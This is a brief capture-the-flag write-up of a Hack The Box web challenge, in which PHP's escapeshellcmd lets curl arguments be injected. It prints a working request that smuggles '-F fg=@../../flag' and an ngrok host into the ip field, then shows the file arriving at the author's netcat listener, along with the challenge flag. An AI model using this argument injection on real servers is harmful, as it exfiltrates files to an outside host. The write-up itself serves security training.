Tags: escapeshellcmd curl 

Rating:

# Abstract
For the detailed version see the [Github page](https://github.com/KamilPacanek/writeups/blob/master/ctf/HTB.CA2021/caas.md).

## ToE
We are given the IP with a port and web application source code dump.

## Recon
Initial scan with `nmap` shows the website is running on `nginx`. Web application exposes the `/api/curl` API presumably using `curl` internally. In `CommandModel.php` file we see that the `curl` command is built from the POST request parameter passed through PHP `escapeshellcmd`.

`escapeshellcmd` have a known vulnerability we are going to exploit. Quoting the manual page:

> **Warning**: `escapeshellcmd()` should be used on the whole command string, and it still allows the attacker to pass arbitrary number of arguments.
> For escaping a single argument `escapeshellarg()` should be used instead.

## Exploit
I've setup the `nc` listener via `ngrok` and run the following request:

`url -H "application/x-www-form-urlencoded" -d 'ip=-F fg=@../../flag 1f106a9e85a2.ngrok.io' -v 138.68.178.56:32236/api/curl`

We see the flag on the netcat output:
```
listening on [any] 4444 ...

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58946
POST / HTTP/1.1
Host: 1f106a9e85a2.ngrok.io
User-Agent: curl/7.64.0
Content-Length: 227
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------a588a0571ed8077f
X-Forwarded-For: 138.68.178.56
X-Forwarded-Proto: http
Accept-Encoding: gzip

--------------------------a588a0571ed8077f
Content-Disposition: form-data; name="fg"; filename="flag"
Content-Type: application/octet-stream

CHTB{f1le_r3trieval_4s_a_s3rv1ce}
--------------------------a588a0571ed8077f--
```

## Solution
> `CHTB{f1le_r3trieval_4s_a_s3rv1ce}`

Original writeup (https://github.com/KamilPacanek/writeups/blob/master/ctf/HTB.CA2021/caas.md).